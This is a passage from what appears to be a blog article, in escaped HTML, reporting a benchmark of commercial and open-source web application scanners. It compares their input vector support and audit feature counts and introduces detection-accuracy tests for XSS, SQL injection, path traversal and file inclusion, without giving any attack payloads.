This section of the benchmark also included the &lt;b&gt;WIVET&lt;/b&gt;
test (Web Input Vector Extractor Teaser), in which scanners were executed
against a dedicated application that can assess their crawling mechanism in the
aspect of input vector extraction. The specific details of this assessment are
provided in the relevant section.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Public tests vs. Obscure tests&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
In order to make the test as fair as possible, while still
enabling the various vendors to show improvement, the benchmark was divided
into tests that were &lt;b&gt;publically announced&lt;/b&gt;, and tests that were &lt;b&gt;obscure
to all vendors&lt;/b&gt;:&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l21 level1 lfo28; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Publically announced
tests:&lt;/b&gt; the active scan feature comparison, and the detection accuracy
assessment of the SQL Injection and Reflected Cross Site Scripting, composed
out of tests cases which were published as a part of WAVSEP v1.1.1)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;mso-list: l21 level1 lfo28; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Tests that were obscure
to all vendors&lt;/b&gt; &lt;b&gt;until the moment of the publication&lt;/b&gt;: the various new
groups of feature comparisons, the WIVET assessment, and the detection accuracy
assessment of the Path Traversal / LFI and Remote File Inclusion (XSS via RFI),
implemented as 940+ test cases in WAVSEP 1.2 (a new version that was only
published alongside this benchmark).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The results of the main test categories are presented within
three graphs (commercial graph, free &amp;amp; open source graph, unified graph),
and the detailed information of each test is presented in a dedicated section
in benchmark presentation platform at &lt;a href=&quot;http://www.sectoolmarket.com/&quot;&gt;http://www.sectoolmarket.com&lt;/a&gt;.
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Now that were finally done with the formality, let&#39;s get to
the interesting part... the results.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;4. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;A Glimpse to the Results of the Benchmark&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
This presentation of results in this benchmark, alongside the
dedicated website (&lt;a href=&quot;http://www.sectoolmarket.com/&quot;&gt;http://www.sectoolmarket.com/&lt;/a&gt;)
and a series of supporting articles and methodologies (&lt;b&gt;[placeholder]&lt;/b&gt;),
are all designed to help the reader to &lt;b&gt;make a decision&lt;/b&gt; - to choose the
proper product/s or tool/s for the task at hand, within the borders of the time
or budget.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
For those of us that can&#39;t wait, and want to get a glimpse
to the summary of the unified results, there is a dedicated page available at
the following links: &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Price &amp;amp; Feature Comparison of Commercial Scanners&lt;/b&gt;&lt;br /&gt;
&lt;a href=&quot;http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-commercial-list.html&quot;&gt;http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-commercial-list.html&lt;/a&gt;
&lt;br /&gt;
&lt;b&gt;Price &amp;amp; Feature Comparison of a Unified List of Commercial, Free and Open Source Products&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&quot;&gt;http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&lt;/a&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir5AAPys8jSTNqRYuF4T5iqvSwtf6QFVPAYC_5EyyfmfogHpa8dPHdV9dyb-84kcl07iKsxUH_hxNFjhAVRqXdHSUbJLRsIU5Ph2MjLxWgqqNeNtxKx7tjDUklaPQcbZytnSG_DkPZ7Rg/s1600/price-comparison.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;408&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir5AAPys8jSTNqRYuF4T5iqvSwtf6QFVPAYC_5EyyfmfogHpa8dPHdV9dyb-84kcl07iKsxUH_hxNFjhAVRqXdHSUbJLRsIU5Ph2MjLxWgqqNeNtxKx7tjDUklaPQcbZytnSG_DkPZ7Rg/s640/price-comparison.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Some of the sections might &lt;b&gt;not be clear&lt;/b&gt; to some of
the readers at this phase, which is why I advise you to read the rest of the
article, &lt;b&gt;prior&lt;/b&gt; to analyzing this summary.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;5. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Test I - Scanner Versatility - Input
Vector Support&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The first assessment criterion was the &lt;b&gt;number&lt;/b&gt; of input
vectors each tool &lt;b&gt;can scan&lt;/b&gt; (and not just parse).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Modern web applications use a variety of sub-protocols and
methods for delivering complex inputs from the browser to the server. These
methods include standard input delivery methods such as HTTP querystring
parameters and HTTP body parameters,&amp;nbsp; modern
delivery methods such as JSON and XML, and even binary delivery methods for
technology specific objects such as AMF, Java serialized objects and WCF.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Since the vast majority of active scan plugins rely on input
that is meant to be injected into client originating parameters, supporting the
parameter (or rather, the input) delivery method of the tested application is a
necessity. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Although the charts in this section don&#39;t necessarily represent
the most important score, it is the &lt;b&gt;most important perquisite&lt;/b&gt; for the
scanner to comply with when scanning a specific technology.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Reasoning&lt;/b&gt;: An automated tool can&#39;t detect a
vulnerability in a given parameter, if it can&#39;t scan the protocol or mimic the application&#39;s
method of delivering the input. The more vectors of input delivery that the
scanner supports, the more versatile it is in scanning different technologies
and applications (assuming it can handle the relevant scan barriers, supports
necessary features such as authentication, or alternatively, contains features that
can be used to work around the specific limitations).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The detailed comparison of the scanners support for various
input delivery methods is documented in detail in the following section of
sectoolmarket (recommended - too many scanners in the chart):&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;a href=&quot;http://www.sectoolmarket.com/input-vector-support-unified-list.html&quot;&gt;http://www.sectoolmarket.com/input-vector-support-unified-list.html&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;text-align: left;&quot;&gt;The following chart shows how versatile each scanner is in scanning different input delivery vectors (and although not entirely accurate - different technologies):&lt;/span&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The Number of Input Vectors Supported – Commercial Tools&lt;/u&gt;&lt;/b&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidWwmG9hSOkmHlMsRHjwLx3edXwH7qRcU9wsOFJV4ntotQCQpNBP1cDRqfVvHmrYsMhb1x5BP6XGQe8EkIaI_pu1YX-7dqK4zos9jHp6KfFQqg5Sa-nHP9BizvM7moHjNjU5eOme9Imac/s1600/InputVectorsUpdate-Commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;144&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidWwmG9hSOkmHlMsRHjwLx3edXwH7qRcU9wsOFJV4ntotQCQpNBP1cDRqfVvHmrYsMhb1x5BP6XGQe8EkIaI_pu1YX-7dqK4zos9jHp6KfFQqg5Sa-nHP9BizvM7moHjNjU5eOme9Imac/s640/InputVectorsUpdate-Commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The Number of Input Vectors Supported&amp;nbsp;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;– Free &amp;amp; Open Source Tools&lt;/u&gt;&lt;/b&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-ydmn_Ssg1fOgGg9zBJ6RuCbmDkuHoIp_M79imkH1cVjAv5rEU_HqT1b51owVJOu13yIgZJK2q3zpr0HquYEsKw-2E6yMAgyul-EhUQbphw7EOID3XIlDNbz9eQuZVifOLtd4XNVNSCg/s1600/input-vectors-support-opensource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;268&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-ydmn_Ssg1fOgGg9zBJ6RuCbmDkuHoIp_M79imkH1cVjAv5rEU_HqT1b51owVJOu13yIgZJK2q3zpr0HquYEsKw-2E6yMAgyul-EhUQbphw7EOID3XIlDNbz9eQuZVifOLtd4XNVNSCg/s640/input-vectors-support-opensource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;b style=&quot;text-align: -webkit-auto;&quot;&gt;&lt;u&gt;The Number of Input Vectors Supported&amp;nbsp;&lt;/u&gt;&lt;/b&gt;&lt;b style=&quot;text-align: -webkit-auto;&quot;&gt;&lt;u&gt;– Unified List&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV3BJO5nf6cxGgRtk6oEcRAHSP7HzyXSSB522IcvAhS8NMl-ryxteBrESmqZ86TDexDAeo6UnN4YWUYTL0JqoHGgfDj8kQ6tQCi8hDuDmZAPggeHdbp-vhfGgP3NfO85KXEPLvUww52jY/s1600/InputVectorsUpdate-Unified.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;369&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV3BJO5nf6cxGgRtk6oEcRAHSP7HzyXSSB522IcvAhS8NMl-ryxteBrESmqZ86TDexDAeo6UnN4YWUYTL0JqoHGgfDj8kQ6tQCi8hDuDmZAPggeHdbp-vhfGgP3NfO85KXEPLvUww52jY/s640/InputVectorsUpdate-Unified.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img border=&quot;0&quot; src=&quot;file:///C:/Users/SHAY~1.CHE/AppData/Local/Temp/msohtmlclip1/01/clip_image004.jpg&quot; style=&quot;background-color: white; text-align: left;&quot; v:shapes=&quot;Picture_x0020_2&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;6. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Test II – Attack Vector Support –
Counting Audit Features&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The second assessment criterion was the &lt;b&gt;number&lt;/b&gt; of audit
features each tool supports.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Reasoning&lt;/b&gt;: An automated tool can&#39;t detect an exposure
that it can&#39;t recognize (at least not directly, and not without manual analysis),
and therefore, the number of audit features will affect the amount of exposures
that the tool will be able to detect (assuming the audit features are &lt;b&gt;&lt;i&gt;implemented
properly&lt;/i&gt;&lt;/b&gt;, that vulnerable &lt;b&gt;&lt;i&gt;entry points will be detected&lt;/i&gt;&lt;/b&gt;,
that the tool will be able to handle the relevant &lt;b&gt;scan barriers&lt;/b&gt; and &lt;b&gt;scanning
perquisites&lt;/b&gt;, &amp;nbsp;and that the tool will &lt;b&gt;&lt;i&gt;manage
to scan the vulnerable input vectors&lt;/i&gt;&lt;/b&gt;).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
For the purpose of the benchmark, an audit feature was
defined as a &lt;b&gt;common&lt;/b&gt; &lt;b&gt;generic application-level &lt;/b&gt;scanning feature, supporting
the detection of exposures which could be used to attack the tested web
application, gain access to sensitive assets or attack legitimate clients.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The definition of the assessment criterion rules out product
specific exposures and infrastructure related vulnerabilities, while unique and
extremely rare features were documented and presented in a different section of
this research, and were not taken into account when calculating the results.
Exposures that were specific to Flash/Applet/Silverlight and Web Services
Assessment (with the exception of XXE) were treated in the same manner. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The detailed comparison of the scanners support for various audit features is documented in detail in the following section of sectoolmarket:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/audit-features-comparison-unified-list.html&quot;&gt;http://sectoolmarket.com/audit-features-comparison-unified-list.html&lt;/a&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The Number of Audit Features in Web Application
Scanners – Commercial Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizDSBZbP7d9b8cDBS42-GbYjEpfz25Hdk-d3MG4zdvUvI-P57Jw85goFVyQ3f1a001Er5g-_GuYUiHyque8504rY5t0JlaLE4R9KVovilc3jd9ni5fJW0y2NB75y1Ge-zK6CKI-NdgmJ8/s1600/updated-audit-features-support-commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;214&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizDSBZbP7d9b8cDBS42-GbYjEpfz25Hdk-d3MG4zdvUvI-P57Jw85goFVyQ3f1a001Er5g-_GuYUiHyque8504rY5t0JlaLE4R9KVovilc3jd9ni5fJW0y2NB75y1Ge-zK6CKI-NdgmJ8/s640/updated-audit-features-support-commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;b style=&quot;text-align: -webkit-auto;&quot;&gt;&lt;u&gt;The Number of Audit Features in Web Application Scanners – Free &amp;amp; Open Source Tools&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRzTmCnJzToOCYdGSoQdoHKEZ9ZKQKEXdkbYuAZSLrd7RQg9a4ywsxSFhZQl_XQVZCmWtmIv_q8tucKDoo4aCjbKxGy4mBRt48lUJ6UF6oOVB3yGpydXJlTQyVeoiNB2Rq5eCJ-to9MAA/s1600/audit-feature-support-opensource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;374&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRzTmCnJzToOCYdGSoQdoHKEZ9ZKQKEXdkbYuAZSLrd7RQg9a4ywsxSFhZQl_XQVZCmWtmIv_q8tucKDoo4aCjbKxGy4mBRt48lUJ6UF6oOVB3yGpydXJlTQyVeoiNB2Rq5eCJ-to9MAA/s640/audit-feature-support-opensource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The Number of Audit Features in Web Application
Scanners – Unified List&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpVkWJuyuLwymVAvZPcXJqgt5gGNgcYJKDSlHitb2QqOuRnvuBa6ekx-3GoeYK5W6WqZ5k9olHNglpWk5Y8ruyRPpgUJgZVDpaXl-Xvcnhn5VdCeYyZXx3RLYzLXxgDSxjGkwSGI1AGh4/s1600/updated-audit-features-support-unified.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;442&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpVkWJuyuLwymVAvZPcXJqgt5gGNgcYJKDSlHitb2QqOuRnvuBa6ekx-3GoeYK5W6WqZ5k9olHNglpWk5Y8ruyRPpgUJgZVDpaXl-Xvcnhn5VdCeYyZXx3RLYzLXxgDSxjGkwSGI1AGh4/s640/updated-audit-features-support-unified.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
So once again, now that were done with the quantity, let&#39;s get to the quality…&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;7. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Introduction to the Various Accuracy
Assessments&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The following sections presents the results of the detection
accuracy assessments performed for Reflected XSS, SQL Injection, Path Traversal
and Remote File Inclusion (RXSS via RFI) - four of the most commonly supported
features in web application scanners. Although the detection accuracy of a
specific exposure might not reflect the overall condition of the scanner on its
own, it is a crucial indicator for how good a scanner is at detecting specific
vulnerability instances. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The various assessments were performed against the various
test cases of WAVSEP v1.2, which emulate different &lt;b&gt;common&lt;/b&gt; test case
scenarios for generic technologies.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Reasoning&lt;/b&gt;: a scanner that is not accurate enough will
miss many exposures, and might classify non-vulnerable entry points as
vulnerable. These tests aim to assess how good is each tool at detecting the vulnerabilities
it claims to support, in a&lt;b&gt; supported input vector, &lt;/b&gt;which is located in&lt;b&gt;
a known entry point&lt;/b&gt;, without any restrictions that can prevent the tool
from operating properly.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;8. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Test III – The Detection Accuracy of
Reflected XSS&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The third assessment criterion was the detection accuracy of
Reflected Cross Site Scripting, a common exposure which is the 2nd most
commonly implemented feature in web application scanners, and the one in which
I noticed the greatest improvement in the various tested web application
scanners.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The comparison of the scanners&#39; reflected cross site scripting detection accuracy is documented in detail in the following section of sectoolmarket:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/reflected-cross-site-scripting-detection-accuracy-unified-list.html&quot;&gt;http://sectoolmarket.com/reflected-cross-site-scripting-detection-accuracy-unified-list.html&lt;/a&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;Result Chart Glossary&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
